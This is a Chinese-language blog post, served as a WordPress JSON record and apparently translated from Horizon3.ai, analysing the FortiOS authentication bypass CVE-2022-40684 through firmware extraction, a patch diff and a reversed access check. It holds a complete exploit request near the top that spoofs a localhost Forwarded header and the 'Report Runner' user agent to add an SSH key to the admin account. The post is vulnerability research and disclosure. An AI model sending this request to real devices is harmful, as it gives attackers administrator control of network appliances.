{"id":784,"date":"2022-10-19T12:00:34","date_gmt":"2022-10-19T04:00:34","guid":{"rendered":"http:\/\/www.aqwu.net\/wp\/?p=784"},"modified":"2022-10-19T12:01:23","modified_gmt":"2022-10-19T04:01:23","slug":"fortios%e3%80%81fortiproxy-%e5%92%8c-fortiswitch%e7%ae%a1%e7%90%86%e5%91%98%e8%ba%ab%e4%bb%bd%e9%aa%8c%e8%af%81%e7%bb%95%e8%bf%87%e6%8a%80%e6%9c%af%e6%b7%b1%e5%85%a5%e6%8e%a2%e8%ae%a8-%ef%bc%88cve-202","status":"publish","type":"post","link":"https:\/\/www.aqwu.net\/wp\/?p=784","title":{"rendered":"FortiOS\u3001FortiProxy \u548c FortiSwitch\u7ba1\u7406\u5458\u8eab\u4efd\u9a8c\u8bc1\u7ed5\u8fc7\u6280\u672f\u6df1\u5165\u63a2\u8ba8 \uff08CVE-2022-40684\uff09"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u4ecb\u7ecd<\/h2>\n\n\n\n<p>Fortinet\u6700\u8fd1\u4fee\u8865\u4e86\u5176FortiOS, FortiProxy\u548cFortiSwitchManager\u9879\u76ee\u4e2d\u7684\u4e00\u4e2a\u5173\u952e\u8eab\u4efd\u9a8c\u8bc1\u7ed5\u8fc7\u6f0f\u6d1e&nbsp;<a href=\"https:\/\/www.fortiguard.com\/psirt\/FG-IR-22-377\">\uff08CVE-2022-40684\uff09<\/a>\u3002\u6b64\u6f0f\u6d1e\u4f7f\u653b\u51fb\u8005\u80fd\u591f\u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u767b\u5f55\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\u4e3a\u4e86\u6f14\u793a\u672c\u6587\u4e2d\u7684\u6f0f\u6d1e\uff0c\u6211\u4eec\u5c06\u4f7f\u7528 FortiOS \u7248\u672c 7.2.1<\/p>\n\n\n\n<p>\u539f\u6587\u94fe\u63a5\uff1ahttps:\/\/www.horizon3.ai\/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684\/<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">POC<\/h2>\n\n\n\n<p>\u8ba9\u6211\u4eec\u6765\u770b\u770b\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u5185\u90e8\u5de5\u4f5c\u539f\u7406\u3002\u60a8\u53ef\u4ee5<a href=\"https:\/\/github.com\/horizon3ai\/CVE-2022-40684\">\u5728\u8fd9\u91cc<\/a>\u627e\u5230\u6211\u4eec\u7684 POC\u3002\u4e0b\u9762\u4f7f\u7528\u8be5\u6f0f\u6d1e\u5411\u7ba1\u7406\u5458\u7528\u6237\u6dfb\u52a0 SSH \u5bc6\u94a5\uff0c\u4f7f\u653b\u51fb\u8005\u80fd\u591f\u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u901a\u8fc7 SSH \u8fdb\u5165\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>PUT \/api\/v2\/cmdb\/system\/admin\/admin HTTP\/1.1 Host: 10.0.40.67 User-Agent: Report Runner Content-Type: application\/json Forwarded: for=\u201d[127.0.0.1]:8000\u2033;by=\u201d[127.0.0.1]:9000\u2033; Content-Length: 612 { \u201cssh-public-key1\u201d: \u201c\\\u201dssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g\/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol\/WSm6\/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja\/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y\/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws\/WxWNFq3Be7c\/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav\/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q\/qM3v4HWKgJObaJnycE\/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\\\u201d\u201d }<\/p><\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">\u6df1\u6f5c<\/h2>\n\n\n\n<p>FortiOS \u516c\u5f00\u4e86\u4e00\u4e2a\u5141\u8bb8\u7528\u6237\u914d\u7f6e\u7cfb\u7edf\u7684\u7ba1\u7406 Web \u95e8\u6237\u3002\u6b64\u5916\uff0c\u7528\u6237\u53ef\u4ee5\u901a\u8fc7 SSH \u8fde\u63a5\u5230\u66b4\u9732\u9501\u5b9a CLI \u63a5\u53e3\u7684\u7cfb\u7edf\u3002\u719f\u6089\u7cfb\u7edf\u540e\uff0c\u6211\u4eec\u7684\u7b2c\u4e00\u6b65\u662f\u5c06\u6613\u53d7\u653b\u51fb\u7684\u56fa\u4ef6\u4e0e\u4fee\u8865\u7684\u56fa\u4ef6\u8fdb\u884c\u6bd4\u8f83\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u56fa\u4ef6\u68c0\u67e5<\/h3>\n\n\n\n<p>\u6211\u4eec\u83b7\u5f97\u4e86\u56fa\u4ef6\u7684 VMware zip \u6587\u4ef6\uff0c\u5176\u4e2d\u5305\u542b\u4e24\u4e2a vmdk \u6587\u4ef6\u3002\u9996\u5148\uff0c\u6211\u4eec\u68c0\u67e5\u4e86 vmdk \u6587\u4ef6\uff0c\u5e76\u4f7f\u7528 \uff1a<code>virt-filesystems<\/code><code>guestmount<\/code><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$&gt;ls *.vmdk\ndatadrive.vmdk fortios.vmdk\n$&gt;sudo virt-filesystems --filesystems -a fortios.vmdk \n\/dev\/sda1\n$&gt;sudo mkdir fortios_mount\n$&gt;sudo guestmount -a fortios.vmdk -m \/dev\/sda1 --ro fortios_mount\n$&gt;cd fortios_mount\n$&gt;ls\nboot.msg datafs.tar.gz extlinux.conf filechecksum flatkc flatkc.chk ldlinux.c32 ldlinux.sys lost+found rootfs.gz rootfs.gz.chk<\/pre>\n\n\n\n<p>\u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u63d0\u53d6\u6839\u6587\u4ef6\u7cfb\u7edf\uff0c\u5728\u90a3\u91cc\u6211\u4eec\u627e\u5230\u4e00\u624b\u88c5\u6ee1.tar.xz\u6587\u4ef6\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$&gt;sudo cp ..\/fortios_mount\/rootfs.gz .\n$&gt;gunzip rootfs.gz \n$&gt;cpio -i 2&gt; \/dev\/null &lt; rootfs \n$&gt;ls\nbin.tar.xz bin.tar.xz.chk boot data data2 dev etc fortidev init lib lib64 migadmin.tar.xz node-scripts.tar.xz proc rootfs sbin sys tmp usr usr.tar.xz usr.tar.xz.chk var<\/pre>\n\n\n\n<p>\u6709\u8da3\u7684\u662f\uff0c\u5c1d\u8bd5\u89e3\u538b\u7f29xz\u6587\u4ef6\u5931\u8d25\u5e76\u51fa\u73b0\u635f\u574f\u9519\u8bef\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$&gt;xz --decompress *.xz\nxz: bin.tar.xz: Compressed data is corrupt\nxz: migadmin.tar.xz: Compressed data is corrupt\nxz: node-scripts.tar.xz: Compressed data is corrupt\nxz: usr.tar.xz: Compressed data is corrupt<\/pre>\n\n\n\n<p>\u76ee\u524d\u5c1a\u4e0d\u6e05\u695a\u8fd9\u662f\u5426\u662f\u6df7\u6dc6\u7684\u5c1d\u8bd5\uff0c\u4f46\u662f\u6211\u4eec\u5728\u56fa\u4ef6\u7684sbin\u6587\u4ef6\u5939\u4e2d\u627e\u5230\u4e86xz\u7684\u7248\u672c\u3002\u6211\u4eec\u65e0\u6cd5\u6309\u539f\u6837\u8fd0\u884c\u5b83\uff0c\u4f46\u6211\u4eec\u53ef\u4ee5\u4fee\u8865\u5176\u94fe\u63a5\u5668\u4ee5\u6307\u5411\u6211\u4eec\u7684\u7cfb\u7edf\u94fe\u63a5\u5668\uff0c\u4ee5\u6700\u7ec8\u89e3\u538b\u7f29\u6587\u4ef6\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$&gt;xz --decompress *.xz\nxz: bin.tar.xz: Compressed data is corrupt\nxz: migadmin.tar.xz: Compressed data is corrupt\nxz: node-scripts.tar.xz: Compressed data is corrupt\nxz: usr.tar.xz: Compressed data is corrupt\n$&gt;find . -name xz\n.\/sbin\/xz\n$&gt;.\/sbin\/xz --decompress *.xz\nbash: .\/sbin\/xz: No such file or directory\n$&gt;file .\/sbin\/xz\n.\/sbin\/xz: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/fortidev\/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=eef5d20a9f8760df951ed122a5faf4de86a7128a, for GNU\/Linux 3.2.0, stripped\n$&gt;patchelf --set-interpreter \/lib64\/ld-linux-x86-64.so.2 sbin\/xz\n$&gt;.\/sbin\/xz --decompress *.xz\n$&gt;ls *.tar\nbin.tar migadmin.tar node-scripts.tar usr.tar<\/pre>\n\n\n\n<p>\u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u89e3\u538b\u7f29\u6587\u4ef6\u5e76\u5f00\u59cb\u68c0\u67e5\u5176\u5185\u5bb9\u3002\u6211\u4eec\u53d1\u73b0\u5305\u542b\u5927\u91cf\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u5176\u4e2d\u8bb8\u591a\u662f \u6307\u5411 \u7684\u7b26\u53f7\u94fe\u63a5\u3002\u8be5\u6587\u4ef6\u5939\u4f3c\u4e4e\u5305\u542b\u7ba1\u7406\u754c\u9762\u7684\u524d\u7aef Web \u4ee3\u7801\u3002\u8be5\u6587\u4ef6\u5939\u4f3c\u4e4e\u5305\u542b\u7ba1\u7406\u63a5\u53e3\u7684 NodeJs \u540e\u7aef\u3002\u6700\u540e\uff0c\u8be5\u6587\u4ef6\u5939\u5305\u542b\u4e00\u4e2a Libaries \u6587\u4ef6\u5939\u548c\u4e00\u4e2a\u914d\u7f6e\u6587\u4ef6\u5939\u3002<code>\/bin<\/code><code>\/bin\/init<\/code><code>migadmin<\/code><code>node-scripts<\/code><code>usr<\/code><code>apache2<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u8865\u4e01<\/h3>\n\n\n\n<p>\u6211\u4eec\u5c06\u76f8\u540c\u7684\u6b65\u9aa4\u5e94\u7528\u4e8e\u56fa\u4ef6\u7248\u672c7.2.2\uff0c\u4ee5\u542f\u7528\u6587\u4ef6\u7cfb\u7edf\u7684\u5dee\u5f02\u3002\u5728\u6587\u4ef6\u5939\u4e2d\uff0c\u6211\u4eec\u53d1\u73b0\u5927\u578b\u4e8c\u8fdb\u5236\u6587\u4ef6\u5df2\u66f4\u6539\uff0c\u5728\u6587\u4ef6\u5939\u4e2d\uff0c\u6211\u4eec\u53d1\u73b0\u6587\u4ef6\u5df2\u66f4\u6539\uff1a<code>bin<\/code><code>init<\/code><code>node-scripts<\/code><code>index.js<\/code><\/p>\n\n\n\n<p><a href=\"https:\/\/u6z4d6v3.rocketcdn.me\/wp-content\/uploads\/2022\/10\/Screen-Shot-2022-10-10-at-9.42.55-AM.png\"><\/a><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"524\" src=\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-8-1024x524.png\" alt=\"\" class=\"wp-image-785\" srcset=\"https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-8-1024x524.png 1024w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-8-300x154.png 300w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-8-768x393.png 768w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-8-1536x787.png 1536w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-8-2048x1049.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>index.js diff<\/figcaption><\/figure>\n\n\n\n<p>\u6b64\u5dee\u5f02\u663e\u793a\u4ee3\u7406\u5904\u7406\u7a0b\u5e8f\u663e\u5f0f\u8bbe\u7f6e \u3001 \u548c \u6807\u5934\u3002\u8fd9\u4e3a\u6211\u4eec\u63d0\u4f9b\u4e86\u4ece\u54ea\u91cc\u5f00\u59cb\u5bfb\u627e\u6709\u5173\u5982\u4f55\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u7ebf\u7d22\u7684\u63d0\u793a\u3002<code>httpsd<\/code><code>forwarded<\/code><code>x-forwarded-vdom<\/code><code>x-forwarded-cert<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">HTTPSD \u548cApache\u5904\u7406\u7a0b\u5e8f<\/h3>\n\n\n\n<p>\u7ecf\u8fc7\u4e00\u4e9b\u641c\u7d22\uff0c\u6211\u4eec\u53d1\u73b0\u6211\u4eec\u524d\u9762\u63d0\u5230\u7684\u521d\u59cb\u5316\u4e8c\u8fdb\u5236\u6587\u4ef6\u5305\u542b\u4e00\u4e9b\u4e0eNodeJs diff\u4e2d\u7684\u6807\u5934\u5339\u914d\u7684\u5b57\u7b26\u4e32\u3002\u8fd9\u4e2a\u521d\u59cb\u5316\u4e8c\u8fdb\u5236\u6587\u4ef6\u76f8\u5f53\u5927\uff0c\u4f3c\u4e4e\u6709\u5f88\u591a\u529f\u80fd\uff0c\u5305\u62ecApache\u94a9\u5b50\u548c\u7528\u4e8e\u5404\u79cd\u7ba1\u7406REST API\u7aef\u70b9\u7684\u5904\u7406\u7a0b\u5e8f\u3002\u4e3a\u4e86\u5e2e\u52a9\u6211\u4eec\u7684\u7814\u7a76\uff0c\u6211\u4eecSSH\u8fdb\u5165\u7cfb\u7edf\u5e76\u542f\u7528\u4e86\u8fc7\u7a0b\u7684\u8c03\u8bd5\u8f93\u51fa\uff1a<code>httpsd<\/code><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">fortios_7_2_1 # diagnose debug enable \nfortios_7_2_1 # diagnose debug application httpsd -1\nDebug messages will be on for 5 minutes.\nfortios_7_2_1 # diagnose debug cli 8\nDebug messages will be on for 5 minutes.<\/pre>\n\n\n\n<p>\u5728\u8c03\u67e5\u6807\u5934\u65f6\uff0c\u6211\u4eec\u53d1\u73b0\u4e00\u4e2a\u94a9\u5b50\u6765\u89e3\u6790\u6807\u5934\uff0c\u63d0\u53d6\u548c\u5b57\u6bb5\uff0c\u5e76\u5c06\u5b83\u4eec\u9644\u52a0\u5230Apache\u7ed3\u6784\u3002\u60a8\u53ef\u4ee5\u770b\u5230\uff0c\u8be5\u5b57\u6bb5\u5141\u8bb8\u6211\u4eec\u5728\u8bf7\u6c42\u8bb0\u5f55\u7684\u8fde\u63a5\u4e0a\u8bbe\u7f6e\u5b57\u6bb5\u3002<code>forwarded<\/code><code>apache access_check_ex<\/code><code>for<\/code><code>by<\/code><code>request_rec<\/code><code>for<\/code><code>client_ip<\/code><\/p>\n\n\n\n<p><a href=\"https:\/\/u6z4d6v3.rocketcdn.me\/wp-content\/uploads\/2022\/10\/Screen-Shot-2022-10-10-at-11.50.11-AM.png\"><\/a><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"566\" src=\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-9-1024x566.png\" alt=\"\" class=\"wp-image-786\" srcset=\"https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-9-1024x566.png 1024w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-9-300x166.png 300w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-9-768x425.png 768w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-9.png 1141w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>forwarded header parsing\uff08\u8f6c\u53d1\u6807\u5934\u89e3\u6790\uff09<\/figcaption><\/figure>\n\n\n\n<p>\u6b64\u5916\uff0c\u6211\u4eec\u8fd8\u770b\u5230\u4e00\u6761\u65e5\u5fd7\u6d88\u606f\uff0c\u5176\u4e2d\u63d0\u5230\u4e86\u7528\u4e8e\u7279\u5b9a\u8bf7\u6c42\u7684\u5904\u7406\u7a0b\u5e8f\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">[httpsd 12478 - 1665412044 &nbsp; &nbsp; info] fweb_debug_init[412] -- Handler \"api_cmdb_v2-handler\" assigned to request<\/pre>\n\n\n\n<p>\u641c\u7d22\u5904\u7406\u7a0b\u5e8f\u5b57\u7b26\u4e32\u540e\uff0c\u6211\u4eec\u5728 init \u4e8c\u8fdb\u5236\u6587\u4ef6\u4e2d\u627e\u5230\u4e00\u4e2a\u5904\u7406\u7a0b\u5e8f\u6570\u7ec4\uff1a<\/p>\n\n\n\n<p><a href=\"https:\/\/u6z4d6v3.rocketcdn.me\/wp-content\/uploads\/2022\/10\/Screen-Shot-2022-10-10-at-10.31.10-AM.png\"><\/a><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"668\" src=\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-10-1024x668.png\" alt=\"\" class=\"wp-image-787\" srcset=\"https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-10-1024x668.png 1024w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-10-300x196.png 300w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-10-768x501.png 768w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-10-1536x1002.png 1536w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-10.png 1538w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>hander array<\/figcaption><\/figure>\n\n\n\n<p>\u5728\u8c03\u67e5\u4e86\u4e00\u4e9b\u5904\u7406\u7a0b\u5e8f\u4e4b\u540e\uff0c\u6211\u4eec\u53d1\u73b0\u5176\u4e2d\u8bb8\u591a\u5904\u7406\u7a0b\u5e8f\u90fd\u8c03\u7528\u4e86\u6211\u4eec\u547d\u540d\u7684\u51fd\u6570\uff1a<code>api_check_access<\/code><\/p>\n\n\n\n<p><a href=\"https:\/\/u6z4d6v3.rocketcdn.me\/wp-content\/uploads\/2022\/10\/Screen-Shot-2022-10-10-at-10.33.48-AM.png\"><\/a><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"883\" height=\"319\" src=\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-11.png\" alt=\"\" class=\"wp-image-788\" srcset=\"https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-11.png 883w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-11-300x108.png 300w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-11-768x277.png 768w\" sizes=\"auto, (max-width: 883px) 100vw, 883px\" \/><figcaption>api_check_access<\/figcaption><\/figure>\n\n\n\n<p>\u6211\u4eec\u7acb\u5373\u88ab\u5438\u5f15\uff0c\u9996\u5148\u68c0\u67e5vdom\u5957\u63a5\u5b57\u9009\u9879\u662f\u5426\u53ef\u4fe1\uff0c\u7136\u540e\u843d\u5165\u6211\u4eec\u8c03\u7528\u7684\u51fd\u6570\u3002<code>api_check_access_for_trusted_source<\/code><code>is_trusted_ip_and_user_agent<\/code><\/p>\n\n\n\n<p><a href=\"https:\/\/u6z4d6v3.rocketcdn.me\/wp-content\/uploads\/2022\/10\/Screen-Shot-2022-10-10-at-11.38.59-AM.png\"><\/a><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"566\" src=\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-12-1024x566.png\" alt=\"\" class=\"wp-image-789\" srcset=\"https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-12-1024x566.png 1024w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-12-300x166.png 300w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-12-768x425.png 768w, https:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/10\/\u56fe\u7247-12.png 1141w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>is_trusted_ip_and_user_agent<\/figcaption><\/figure>\n\n\n\n<p id=\"caption-attachment-4299\"><\/p>\n\n\n\n<p>\u60a8\u53ef\u4ee5\u770b\u5230\uff0c\u6b64\u51fd\u6570\u68c0\u67e5 \u662f\u5426\u4e3a\u201c127.0.01\u201d\uff0c\u4ee5\u53ca\u6807\u5934\u662f\u5426\u4e0e\u7b2c\u4e8c\u4e2a\u53c2\u6570\u5339\u914d\u3002\u4f7f\u7528\u4e24\u4e2a\u53ef\u80fd\u7684\u53c2\u6570\u8c03\u7528\u6b64\u51fd\u6570\uff1a\u201c\u8282\u70b9.js\u201d\u548c\u201c\u62a5\u8868\u8fd0\u884c\u7a0b\u5e8f\u201d\u3002\u201cNode.js\u201d\u8def\u5f84\u4f3c\u4e4e\u6267\u884c\u4e86\u4e00\u4e9b\u989d\u5916\u7684\u9a8c\u8bc1\uff0c\u4f46\u4f7f\u7528\u201c\u62a5\u8868\u8fd0\u884c\u7a0b\u5e8f\u201d\u53ef\u4ee5\u8ba9\u6211\u4eec\u7ed5\u8fc7\u8eab\u4efd\u9a8c\u8bc1\u5e76\u6267\u884c API \u8bf7\u6c42\uff01<code>client_ip<\/code><code>User-Agent<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6b66\u5668\u5316<\/h3>\n\n\n\n<p>\u5411 REST API \u53d1\u51fa\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8bf7\u6c42\u7684\u80fd\u529b\u975e\u5e38\u5f3a\u5927\u3002\u4f46\u662f\uff0c\u6211\u4eec\u6ce8\u610f\u5230\u6211\u4eec\u65e0\u6cd5\u6dfb\u52a0\u6216\u66f4\u6539\u7ba1\u7406\u5458\u7528\u6237\u7684\u5bc6\u7801\u3002\u4e3a\u4e86\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff0c\u6211\u4eec\u66f4\u65b0\u4e86\u7ba1\u7406\u5458\u7528\u6237\u7684SSH\u5bc6\u94a5\uff0c\u4ee5\u5141\u8bb8\u6211\u4eec\u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u5411\u76ee\u6807SSH<a href=\"https:\/\/twitter.com\/Horizon3Attack\/status\/1579285863108087810\">\u3002<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u603b\u7ed3<\/h2>\n\n\n\n<p>\u603b\u7ed3\u4e00\u4e0b\uff0c\u8fd9\u91cc\u6982\u8ff0\u4e86\u5229\u7528\u8fd9\u79cd\u6f0f\u6d1e\u7684\u8bf7\u6c42\u7684\u5fc5\u8981\u6761\u4ef6\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528 Fowarded \u6807\u5934\u5c06 <code>client_ip<\/code> \u8bbe\u7f6e\u4e3a\u201c127.0.0.1\u201d\u3002<\/li><li>\u201c\u53ef\u4fe1\u8bbf\u95ee\u201d\u8eab\u4efd\u9a8c\u8bc1\u68c0\u67e5\u9a8c\u8bc1 <code>client_ip<\/code> s \u201c127.0.0.1\u201d \u548c <code>User-Agent<\/code> \u662f\u201cReport Runner\u201d\u662f\u5426\u90fd\u5728\u653b\u51fb\u8005\u7684\u63a7\u5236\u4e4b\u4e0b\u3002<\/li><\/ol>\n\n\n\n<p>\u5bf9\u7cfb\u7edf\u7ba1\u7406\u63a5\u53e3\u7684\u4efb\u4f55\u7b26\u5408\u4e0a\u8ff0\u6761\u4ef6\u7684 HTTP \u8bf7\u6c42\u90fd\u5e94\u5f15\u8d77\u5173\u6ce8\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6b64\u6f0f\u6d1e\u5bf9\u6613\u53d7\u653b\u51fb\u7684\u7cfb\u7edf\u6267\u884c\u4efb\u4f55\u64cd\u4f5c\u3002\u8fd9\u5305\u62ec\u66f4\u6539\u7f51\u7edc\u914d\u7f6e\u3001\u6dfb\u52a0\u65b0\u7528\u6237\u548c\u542f\u52a8\u6570\u636e\u5305\u6355\u83b7\u3002\u8bf7\u6ce8\u610f\uff0c\u8fd9\u4e0d\u662f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u552f\u4e00\u65b9\u6cd5\uff0c\u5e76\u4e14\u53ef\u80fd\u8fd8\u6709\u5176\u4ed6\u4e00\u7ec4\u6709\u6548\u7684\u6761\u4ef6\u3002\u4f8b\u5982\uff0c\u6b64\u6f0f\u6d1e\u7684\u4fee\u6539\u7248\u672c\u4f7f\u7528 <code>User-Agent<\/code> \u201cNode.js\u201d\u3002\u6b64\u6f0f\u6d1e\u5229\u7528\u4f3c\u4e4e\u9075\u5faa\u6700\u8fd1\u53d1\u73b0\u7684\u4f01\u4e1a\u8f6f\u4ef6\u6f0f\u6d1e\u7684\u8d8b\u52bf\uff0c\u5176\u4e2dHTTP\u6807\u5934\u672a\u6b63\u786e\u9a8c\u8bc1\u6216\u8fc7\u5ea6\u4fe1\u4efb\u3002\u6211\u4eec\u5728\u6700\u8fd1\u7684&nbsp;<a href=\"https:\/\/www.horizon3.ai\/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive\/\">F5<\/a>&nbsp;\u548c&nbsp;<a href=\"https:\/\/www.horizon3.ai\/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive\/\">VMware<\/a>&nbsp;\u6f0f\u6d1e\u4e2d\u770b\u5230\u4e86\u8fd9\u4e00\u70b9\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/u6z4d6v3.rocketcdn.me\/wp-content\/uploads\/2022\/10\/streamlinehq-cog-approved-interface-essential-100.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/u6z4d6v3.rocketcdn.me\/wp-content\/uploads\/2022\/10\/streamlinehq-cog-approved-interface-essential-100.png\"><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4ecb\u7ecd Fortinet\u6700\u8fd1\u4fee\u8865\u4e86\u5176FortiOS, FortiProxy\u548cFortiSwitchManager [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center 